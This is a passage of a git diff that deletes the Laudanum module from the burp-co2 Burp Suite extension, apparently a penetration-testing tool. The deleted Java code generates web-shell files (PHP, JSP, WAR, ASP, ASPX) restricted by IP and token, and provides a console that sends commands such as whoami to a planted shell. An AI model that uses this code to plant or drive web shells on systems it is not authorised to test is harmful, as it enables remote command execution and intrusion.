"shell.aspx", "Choose aspx filename"); - if (file != null) { - FileOutputStream fos = new FileOutputStream(file); - processTemplate(fos, renderList(acceptIPs.split(","), ",", "\""), acceptToken); - } - } - - @Override - String getTemplate() { - return "com/professionallyevil/co2/laudanum/aspx/shell.aspx"; - } -} diff --git a/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/JSPShellPayloadType.java b/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/JSPShellPayloadType.java deleted file mode 100644 index 3227f43..0000000 --- a/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/JSPShellPayloadType.java +++ /dev/null @@ -1,22 +0,0 @@ -package com.professionallyevil.co2.laudanum; - -import java.awt.*; -import java.io.File; -import java.io.FileOutputStream; - -public class JSPShellPayloadType extends PayloadType { - @Override - public void savePayload(Component parentComponent, String acceptIPs, String acceptToken) throws Exception { - File file = chooseFile(parentComponent, "shell.jsp", "Choose jsp filename"); - if (file != null) { - FileOutputStream fos = new FileOutputStream(file); - processTemplate(fos, renderList(acceptIPs.split(","), ",", "\""), acceptToken); - - } - } - - @Override - String getTemplate() { - return "com/professionallyevil/co2/laudanum/java/shell.jsp"; - } -} diff --git a/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/LaudanumClient.form b/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/LaudanumClient.form deleted file mode 100644 index 52243e8..0000000 --- a/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/LaudanumClient.form +++ /dev/null @@ -1,339 +0,0 @@ - -

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/LaudanumClient.java b/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/LaudanumClient.java deleted file mode 100644 index 3b90edc..0000000 --- a/modules/co2-laudanum/src/com/professionallyevil/co2/laudanum/LaudanumClient.java +++ /dev/null @@ -1,524 +0,0 @@ -package com.professionallyevil.co2.laudanum; - -import burp.*; -import com.professionallyevil.co2.Co2Configurable; -import com.professionallyevil.co2.Co2Extender; -import com.professionallyevil.co2.Co2HelpLink; - -import javax.swing.*; -import javax.swing.event.ChangeEvent; -import javax.swing.event.ChangeListener; -import javax.swing.text.AbstractDocument; -import javax.swing.text.AttributeSet; -import javax.swing.text.BadLocationException; -import javax.swing.text.DocumentFilter; -import java.awt.*; -import java.awt.datatransfer.Clipboard; -import java.awt.datatransfer.ClipboardOwner; -import java.awt.datatransfer.StringSelection; -import java.awt.datatransfer.Transferable; -import java.awt.event.*; -import java.beans.PropertyChangeEvent; -import java.beans.PropertyChangeListener; -import java.net.MalformedURLException; -import java.net.URL; -import java.util.ArrayList; -import java.util.HashMap; -import java.util.Map; -import java.util.Random; - -public class LaudanumClient implements Co2Configurable, ClipboardOwner, IContextMenuFactory { - private JPanel mainPanel; - private JTextField txtAllowedToken; - private JTextField txtAllowedIP; - private JButton btnGenerate; - private JComboBox cmboMethod; - private JTextField txtHostname; - private JTextField txtPostBody; - private JTextArea txtConsole; - private JComboBox cmboProtocol; - private JTextField txtPort; - private JTextField txtResource; - private JComboBox cmboFiletype; - private JButton btnSave; - private JButton btnConnect; - private JComboBox cmboPrepend; - private JLabel helpButton; - private JCheckBox chkUseRequestTemplate; - private JLabel lblRequestTemplate; - private String cwd = "."; - private int commandStart = 0; - private IBurpExtenderCallbacks callbacks; - private static final String SETTING_LAUD_TOKEN = "LAUD.TOKEN"; - private static final String SETTING_LAUD_IP = "LAUD.IP"; - private byte[] requestTemplate = null; - private Co2Extender extender; - final java.util.List history = new ArrayList(); - int historyPointer = 0; - - - final protected static char[] hexArray = "0123456789ABCDEF".toCharArray(); - - public LaudanumClient(final Co2Extender extender) { - this.extender = extender; - final Map payloadTypes = new HashMap(); - payloadTypes.put("PHP Shell", new PHPShellPayloadType()); - payloadTypes.put("JSP Shell", new JSPShellPayloadType()); - payloadTypes.put("WAR Shell", new WARShellPayloadType()); - payloadTypes.put("ASP Shell", new ASPShellPayloadType()); - payloadTypes.put("ASPX Shell", new ASPXShellPayloadType()); - - this.callbacks = extender.getCallbacks(); - String token = callbacks.loadExtensionSetting(SETTING_LAUD_TOKEN); - if (token != null && token.length() > 0) { - txtAllowedToken.setText(token); - } - String ips = callbacks.loadExtensionSetting(SETTING_LAUD_IP); - if (ips != null && ips.length() > 0) { - txtAllowedIP.setText(ips); - } - - //showPrompt(); - ((AbstractDocument) txtConsole.getDocument()).setDocumentFilter(new DocumentFilter() { - @Override - public void remove(FilterBypass fb, int offset, int length) throws BadLocationException { - if (checkCommandPosition(offset)) { - super.remove(fb, offset, length); - } - } - - @Override - public void replace(FilterBypass fb, int offset, int length, String text, AttributeSet attrs) throws BadLocationException { - //if(checkCommandPosition(offset)) { - super.replace(fb, offset, length, text, attrs); - //} - } - - @Override - public void insertString(FilterBypass fb, int offset, String string, AttributeSet attr) throws BadLocationException { - super.insertString(fb, offset, string, attr); - } - - private boolean checkCommandPosition(int offset) { - return offset >= commandStart; - } - }); - - txtConsole.addKeyListener(new KeyAdapter() { - @Override - public void keyReleased(KeyEvent e) { - if (e.getKeyCode() == KeyEvent.VK_ENTER) { - int currentPosition = txtConsole.getCaretPosition(); - try { - String command = txtConsole.getText(commandStart, (currentPosition - commandStart - 1)); - - runCommand(command, false); - } catch (BadLocationException e1) { - callbacks.printError(e1.toString()); - } catch (MalformedURLException e1) { - callbacks.printError(e1.toString()); - } catch (NumberFormatException e1) { - callbacks.printError(e1.toString()); - } - } else { - super.keyReleased(e); - } - } - - @Override - public void keyPressed(KeyEvent e) { - if (e.getKeyCode() == KeyEvent.VK_UP) { - // TODO: handle history - this gets detected but not interrupted - } else { - super.keyPressed(e); - } - } - - - }); - txtConsole.addMouseListener(new MouseAdapter() { - @Override - public void mouseReleased(MouseEvent e) { - if (txtConsole.getSelectedText().length() > 0) { // todo: this may generate a NullPointerException - Clipboard clipboard = Toolkit.getDefaultToolkit().getSystemClipboard(); - StringSelection contents = new StringSelection(txtConsole.getSelectedText()); - clipboard.setContents(contents, LaudanumClient.this); - } - txtConsole.setCaretPosition(txtConsole.getText().length()); - } - }); - btnGenerate.addActionListener(new ActionListener() { - @Override - public void actionPerformed(ActionEvent e) { - Random r = new Random(); - byte[] bytes = new byte[20]; - r.nextBytes(bytes); - txtAllowedToken.setText(bytesToHex(bytes)); - } - }); - btnSave.addActionListener(new ActionListener() { - @Override - public void actionPerformed(ActionEvent e) { - PayloadType pt = payloadTypes.get(cmboFiletype.getSelectedItem().toString()); - try { - pt.savePayload(mainPanel, txtAllowedIP.getText(), txtAllowedToken.getText()); - } catch (Exception e1) { - callbacks.printError("Error saving payload: " + e1.getMessage()); - JOptionPane.showMessageDialog(mainPanel, "Error saving payload. " + e1.getMessage(), "Error", JOptionPane.ERROR_MESSAGE); - } - } - }); - cmboMethod.addActionListener(new ActionListener() { - @Override - public void actionPerformed(ActionEvent e) { - txtPostBody.setEnabled(cmboMethod.getSelectedItem().equals("POST")); - } - }); - btnConnect.addActionListener(new ActionListener() { - @Override - public void actionPerformed(ActionEvent e) { - try { - txtConsole.setText("Connecting to " + cmboProtocol.getSelectedItem().toString() + "://" + txtHostname.getText() + ":" + txtPort.getText() + txtResource.getText() + ".....\nwhoami\n"); - runCommand("whoami", true); - } catch (MalformedURLException e1) { - txtConsole.setText("Malformed URL. Check your hostname and port."); - e1.printStackTrace(); - } - } - }); - - txtAllowedToken.addPropertyChangeListener(new PropertyChangeListener() { - @Override - public void propertyChange(PropertyChangeEvent evt) { - callbacks.saveExtensionSetting(SETTING_LAUD_TOKEN, txtAllowedToken.getText()); - } - }); - - txtAllowedIP.addPropertyChangeListener(new PropertyChangeListener() { - @Override - public void propertyChange(PropertyChangeEvent evt) { - callbacks.saveExtensionSetting(SETTING_LAUD_IP, txtAllowedIP.getText()); - } - }); - - cmboProtocol.addActionListener(new ActionListener() { - public void actionPerformed(ActionEvent e) { - if (cmboProtocol.getSelectedItem().equals("http") && txtPort.getText().equals("443")) { - txtPort.setText("80"); - } else if (cmboProtocol.getSelectedItem().equals("https") && txtPort.getText().equals("80")) { - txtPort.setText("443"); - } - } - }); - helpButton.addMouseListener(new Co2HelpLink("https://github.com/JGillam/burp-co2/wiki/SQLMapper", helpButton)); - - chkUseRequestTemplate.addChangeListener(new ChangeListener() { - @Override - public void stateChanged(ChangeEvent e) { - cmboProtocol.setEnabled(!chkUseRequestTemplate.isSelected()); - txtPort.setEnabled(!chkUseRequestTemplate.isSelected()); - txtResource.setEnabled(!chkUseRequestTemplate.isSelected()); - txtHostname.setEnabled(!chkUseRequestTemplate.isSelected()); - } - }); - } - - - private void runCommand(String command, boolean muteOutput) throws MalformedURLException { - if (command.equals("clear")) { - txtConsole.setText(""); - commandStart = 0; - } else if (command.equals("cd ..")) { - int i = cwd.lastIndexOf('/'); - if (i == 0) { - cwd = "/"; - } else if (i > -1) { - cwd = cwd.substring(0, i); - } else { - i = cwd.lastIndexOf('\\'); - if (i > 0) { - cwd = cwd.substring(0, i); - if (cwd.indexOf('\\') == -1) { - cwd = cwd + '\\'; - } - } - } - } else { - - URL url = new URL(cmboProtocol.getSelectedItem() + "://" + txtHostname.getText() + ":" + txtPort.getText() + txtResource.getText()); - - LaudanumRequest lreq; - if (requestTemplate != null && chkUseRequestTemplate.isSelected()) { - lreq = new LaudanumRequest(callbacks, cmboMethod.getSelectedItem().toString(), requestTemplate); - } else { - lreq = new LaudanumRequest(callbacks, url, cmboMethod.getSelectedItem().toString()); - } - lreq.setCommand(command.startsWith("cd ") ? command : getPrepend() + command); - lreq.setToken(txtAllowedToken.getText()); - lreq.setWorkingDirectory(cwd); - - //TODO: fix error output on PHP error - - byte[] responseBytes = callbacks.makeHttpRequest(txtHostname.getText(), new Integer(txtPort.getText()), "https".equalsIgnoreCase(cmboProtocol.getSelectedItem().toString()), lreq.getRequestBytes()); - - LaudanumResponse lresp = new LaudanumResponse(callbacks, responseBytes); - - if (lresp.getCwd().length() > 0) { - cwd = lresp.getCwd(); - } - txtConsole.append(lresp.getStdout()); - txtConsole.append(lresp.getStderr()); - - } - history.add(command); - historyPointer = history.size() - 1; - txtConsole.append("\n"); - showPrompt(); - } - - public static String bytesToHex(byte[] bytes) { - char[] hexChars = new char[bytes.length * 2]; - for (int j = 0; j < bytes.length; j++) { - int v = bytes[j] & 0xFF; - hexChars[j * 2] = hexArray[v >>> 4]; - hexChars[j * 2 + 1] = hexArray[v & 0x0F]; - } - return new String(hexChars); - } - - private void showPrompt() { - if (cwd.equals(".")) { - txtConsole.append("laudanum> "); - } else { - txtConsole.append("laudanum[" + cwd + "]> "); - } - txtConsole.setCaretPosition(txtConsole.getText().length()); - commandStart = txtConsole.getCaretPosition(); - if (!txtConsole.hasFocus()) { - txtConsole.grabFocus(); - } - } - - - @Override - public Component getTabComponent() { - return mainPanel; - } - - @Override - public String getTabTitle() { - return "Laudanum"; - } - - @Override - public void lostOwnership(Clipboard clipboard, Transferable contents) { - // do nothing - } - - @Override - public String getTabCaption() { - return getTabTitle(); - } - - @Override - public Component getUiComponent() { - return getTabComponent(); - } - - private String getPrepend() { - return "".equals(cmboPrepend.getSelectedItem().toString()) ? "" : cmboPrepend.getSelectedItem().toString(); - } - - @Override - public java.util.List createMenuItems(IContextMenuInvocation invocation) { - IHttpRequestResponse[] messages = invocation.getSelectedMessages(); - if (messages != null && messages.length > 0) { - callbacks.printOutput("Messages in array: " + messages.length); - java.util.List list = new ArrayList(); - final IHttpService service = messages[0].getHttpService(); - final byte[] sentRequestBytes = messages[0].getRequest(); - JMenuItem menuItem = new JMenuItem("Send to Laudanum"); - menuItem.addActionListener(new ActionListener() { - @Override - public void actionPerformed(ActionEvent e) { - try { - requestTemplate = sentRequestBytes; - IRequestInfo info = callbacks.getHelpers().analyzeRequest(service, requestTemplate); - txtHostname.setText(service.getHost()); - cmboProtocol.setSelectedItem(service.getProtocol()); - txtResource.setText(info.getUrl().getFile()); - txtPort.setText("" + info.getUrl().getPort()); - lblRequestTemplate.setText(info.getUrl().toString()); - chkUseRequestTemplate.setEnabled(true); - chkUseRequestTemplate.setSelected(true); - callbacks.printOutput("Laudanum received request template for " + info.getUrl().toString()); - extender.selectConfigurableTab(LaudanumClient.this, true); - } catch (Exception e1) { - callbacks.printError(e1.getMessage()); - } - } - }); - list.add(menuItem); - return list; - } - - return null; - } - - { -// GUI initializer generated by IntelliJ IDEA GUI Designer -// >>> IMPORTANT!! <<< -// DO NOT EDIT OR ADD ANY CODE HERE! - $$$setupUI$$$(); - } - - /** - * Method generated by IntelliJ IDEA GUI Designer - * >>> IMPORTANT!! <<< - * DO NOT edit this method OR call it in your code! - * - * @noinspection ALL - */ - private void $$$setupUI$$$() { - mainPanel = new JPanel(); - mainPanel.setLayout(new com.intellij.uiDesigner.core.GridLayoutManager(4, 1, new Insets(5, 5, 5, 5), -1, -1)); - final JPanel panel1 = new JPanel(); - panel1.setLayout(new com.intellij.uiDesigner.core.GridLayoutManager(1, 2, new Insets(0, 0, 0, 0), -1, -1)); - mainPanel.add(panel1, new com.intellij.uiDesigner.core.GridConstraints(0, 0, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_CENTER, com.intellij.uiDesigner.core.GridConstraints.FILL_BOTH, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_SHRINK | com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_SHRINK | com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_GROW, null, null, null, 0, false)); - final com.intellij.uiDesigner.core.Spacer spacer1 = new com.intellij.uiDesigner.core.Spacer(); - panel1.add(spacer1, new com.intellij.uiDesigner.core.GridConstraints(0, 0, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_CENTER, com.intellij.uiDesigner.core.GridConstraints.FILL_HORIZONTAL, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_WANT_GROW, 1, null, null, null, 0, false)); - helpButton = new JLabel(); - helpButton.setEnabled(true); - helpButton.setIcon(new ImageIcon(getClass().getResource("/com/professionallyevil/co2/images/help.png"))); - helpButton.setText(""); - panel1.add(helpButton, new com.intellij.uiDesigner.core.GridConstraints(0, 1, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_WEST, com.intellij.uiDesigner.core.GridConstraints.FILL_NONE, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); - final JPanel panel2 = new JPanel(); - panel2.setLayout(new com.intellij.uiDesigner.core.GridLayoutManager(3, 4, new Insets(0, 0, 0, 0), -1, -1)); - mainPanel.add(panel2, new com.intellij.uiDesigner.core.GridConstraints(1, 0, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_CENTER, com.intellij.uiDesigner.core.GridConstraints.FILL_BOTH, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_SHRINK | com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_SHRINK | com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_GROW, null, null, null, 0, false)); - panel2.setBorder(BorderFactory.createTitledBorder(BorderFactory.createLineBorder(Color.black), "File Inclusion Setup")); - txtAllowedToken = new JTextField(); - panel2.add(txtAllowedToken, new com.intellij.uiDesigner.core.GridConstraints(2, 1, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_WEST, com.intellij.uiDesigner.core.GridConstraints.FILL_HORIZONTAL, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_WANT_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, new Dimension(150, -1), null, 0, false)); - final JLabel label1 = new JLabel(); - label1.setText("Token:"); - panel2.add(label1, new com.intellij.uiDesigner.core.GridConstraints(2, 0, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_WEST, com.intellij.uiDesigner.core.GridConstraints.FILL_NONE, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); - txtAllowedIP = new JTextField(); - panel2.add(txtAllowedIP, new com.intellij.uiDesigner.core.GridConstraints(1, 1, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_WEST, com.intellij.uiDesigner.core.GridConstraints.FILL_HORIZONTAL, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_WANT_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, new Dimension(150, -1), null, 0, false)); - final JLabel label2 = new JLabel(); - label2.setText("Restrict IP:"); - panel2.add(label2, new com.intellij.uiDesigner.core.GridConstraints(1, 0, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_WEST, com.intellij.uiDesigner.core.GridConstraints.FILL_NONE, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); - btnGenerate = new JButton(); - btnGenerate.setText("Gen New Token"); - panel2.add(btnGenerate, new com.intellij.uiDesigner.core.GridConstraints(2, 2, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_CENTER, com.intellij.uiDesigner.core.GridConstraints.FILL_HORIZONTAL, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_SHRINK | com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); - final JLabel label3 = new JLabel(); - label3.setText("Type:"); - panel2.add(label3, new com.intellij.uiDesigner.core.GridConstraints(0, 0, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_WEST, com.intellij.uiDesigner.core.GridConstraints.FILL_NONE, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); - cmboFiletype = new JComboBox(); - final DefaultComboBoxModel defaultComboBoxModel1 = new DefaultComboBoxModel(); - defaultComboBoxModel1.addElement("PHP Shell"); - defaultComboBoxModel1.addElement("JSP Shell"); - defaultComboBoxModel1.addElement("WAR Shell"); - defaultComboBoxModel1.addElement("ASP Shell"); - defaultComboBoxModel1.addElement("ASPX Shell"); - cmboFiletype.setModel(defaultComboBoxModel1); - panel2.add(cmboFiletype, new com.intellij.uiDesigner.core.GridConstraints(0, 1, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_WEST, com.intellij.uiDesigner.core.GridConstraints.FILL_HORIZONTAL, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); - final com.intellij.uiDesigner.core.Spacer spacer2 = new com.intellij.uiDesigner.core.Spacer(); - panel2.add(spacer2, new com.intellij.uiDesigner.core.GridConstraints(1, 3, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_CENTER, com.intellij.uiDesigner.core.GridConstraints.FILL_HORIZONTAL, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_WANT_GROW, 1, null, null, null, 0, false)); - btnSave = new JButton(); - btnSave.setText("Generate File"); - panel2.add(btnSave, new com.intellij.uiDesigner.core.GridConstraints(0, 2, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_CENTER, com.intellij.uiDesigner.core.GridConstraints.FILL_HORIZONTAL, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_SHRINK | com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); - final com.intellij.uiDesigner.core.Spacer spacer3 = new com.intellij.uiDesigner.core.Spacer(); - mainPanel.add(spacer3, new com.intellij.uiDesigner.core.GridConstraints(3, 0, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_CENTER, com.intellij.uiDesigner.core.GridConstraints.FILL_VERTICAL, 1, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_WANT_GROW, null, null, null, 0, false)); - final JPanel panel3 = new JPanel(); - panel3.setLayout(new com.intellij.uiDesigner.core.GridLayoutManager(4, 1, new Insets(0, 0, 0, 0), -1, -1)); - mainPanel.add(panel3, new com.intellij.uiDesigner.core.GridConstraints(2, 0, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_CENTER, com.intellij.uiDesigner.core.GridConstraints.FILL_BOTH, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_SHRINK | com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_SHRINK | com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_GROW, null, null, null, 0, false)); - panel3.setBorder(BorderFactory.createTitledBorder(BorderFactory.createLineBorder(Color.black), "Console")); - final JPanel panel4 = new JPanel(); - panel4.setLayout(new com.intellij.uiDesigner.core.GridLayoutManager(3, 4, new Insets(0, 0, 0, 0), -1, -1)); - panel3.add(panel4, new com.intellij.uiDesigner.core.GridConstraints(1, 0, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_CENTER, com.intellij.uiDesigner.core.GridConstraints.FILL_BOTH, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_SHRINK | com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_SHRINK | com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_GROW, null, null, null, 0, false)); - cmboMethod = new JComboBox(); - final DefaultComboBoxModel defaultComboBoxModel2 = new DefaultComboBoxModel(); - defaultComboBoxModel2.addElement("GET"); - defaultComboBoxModel2.addElement("POST"); - cmboMethod.setModel(defaultComboBoxModel2); - cmboMethod.setToolTipText("What type of Laudanum parameters do you want to use?"); - panel4.add(cmboMethod, new com.intellij.uiDesigner.core.GridConstraints(0, 0, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_WEST, com.intellij.uiDesigner.core.GridConstraints.FILL_HORIZONTAL, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); - txtHostname = new JTextField(); - txtHostname.setText("hostname"); - panel4.add(txtHostname, new com.intellij.uiDesigner.core.GridConstraints(0, 3, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_WEST, com.intellij.uiDesigner.core.GridConstraints.FILL_HORIZONTAL, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_WANT_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, new Dimension(150, -1), null, 0, false)); - txtPostBody = new JTextField(); - txtPostBody.setEnabled(false); - txtPostBody.setVisible(false); - panel4.add(txtPostBody, new com.intellij.uiDesigner.core.GridConstraints(2, 3, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_WEST, com.intellij.uiDesigner.core.GridConstraints.FILL_HORIZONTAL, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_WANT_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, new Dimension(150, -1), null, 0, false)); - cmboProtocol = new JComboBox(); - final DefaultComboBoxModel defaultComboBoxModel3 = new DefaultComboBoxModel(); - defaultComboBoxModel3.addElement("http"); - defaultComboBoxModel3.addElement("https"); - cmboProtocol.setModel(defaultComboBoxModel3); - panel4.add(cmboProtocol, new com.intellij.uiDesigner.core.GridConstraints(0, 1, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_WEST, com.intellij.uiDesigner.core.GridConstraints.FILL_HORIZONTAL, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); - final JLabel label4 = new JLabel(); - label4.setText("POST Body:"); - label4.setVisible(false); - panel4.add(label4, new com.intellij.uiDesigner.core.GridConstraints(2, 2, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_WEST, com.intellij.uiDesigner.core.GridConstraints.FILL_NONE, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); - final JLabel label5 = new JLabel(); - label5.setText("Resource:"); - panel4.add(label5, new com.intellij.uiDesigner.core.GridConstraints(1, 2, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_WEST, com.intellij.uiDesigner.core.GridConstraints.FILL_NONE, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); - txtResource = new JTextField(); - txtResource.setText("/shell.php"); - panel4.add(txtResource, new com.intellij.uiDesigner.core.GridConstraints(1, 3, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_WEST, com.intellij.uiDesigner.core.GridConstraints.FILL_HORIZONTAL, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_WANT_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, new Dimension(150, -1), null, 0, false)); - txtPort = new JTextField(); - txtPort.setText("80"); - panel4.add(txtPort, new com.intellij.uiDesigner.core.GridConstraints(1, 1, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_WEST, com.intellij.uiDesigner.core.GridConstraints.FILL_HORIZONTAL, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, new Dimension(45, -1), null, 0, false)); - final JLabel label6 = new JLabel(); - label6.setText("Host:"); - panel4.add(label6, new com.intellij.uiDesigner.core.GridConstraints(0, 2, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_WEST, com.intellij.uiDesigner.core.GridConstraints.FILL_NONE, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); - final JLabel label7 = new JLabel(); - label7.setText("Port:"); - panel4.add(label7, new com.intellij.uiDesigner.core.GridConstraints(1, 0, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_WEST, com.intellij.uiDesigner.core.GridConstraints.FILL_NONE, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); - final JLabel label8 = new JLabel(); - label8.setText("Prepend:"); - panel4.add(label8, new com.intellij.uiDesigner.core.GridConstraints(2, 0, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_WEST, com.intellij.uiDesigner.core.GridConstraints.FILL_NONE, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); - cmboPrepend = new JComboBox(); - cmboPrepend.setEditable(true); - final DefaultComboBoxModel defaultComboBoxModel4 = new DefaultComboBoxModel(); - defaultComboBoxModel4.addElement(""); - defaultComboBoxModel4.addElement("%ComSpec% /c"); - cmboPrepend.setModel(defaultComboBoxModel4); - cmboPrepend.setToolTipText("Typically only used for ASP."); - panel4.add(cmboPrepend, new com.intellij.uiDesigner.core.GridConstraints(2, 1, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_WEST, com.intellij.uiDesigner.core.GridConstraints.FILL_HORIZONTAL, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); - final JScrollPane scrollPane1 = new JScrollPane(); - panel3.add(scrollPane1, new com.intellij.uiDesigner.core.GridConstraints(3, 0, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_CENTER, com.intellij.uiDesigner.core.GridConstraints.FILL_BOTH, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_SHRINK | com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_WANT_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_SHRINK | com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_WANT_GROW, null, null, null, 0, false)); - txtConsole = new JTextArea(); - txtConsole.setFont(new Font("Monospaced", txtConsole.getFont().getStyle(), txtConsole.getFont().getSize())); - txtConsole.setLineWrap(true); - 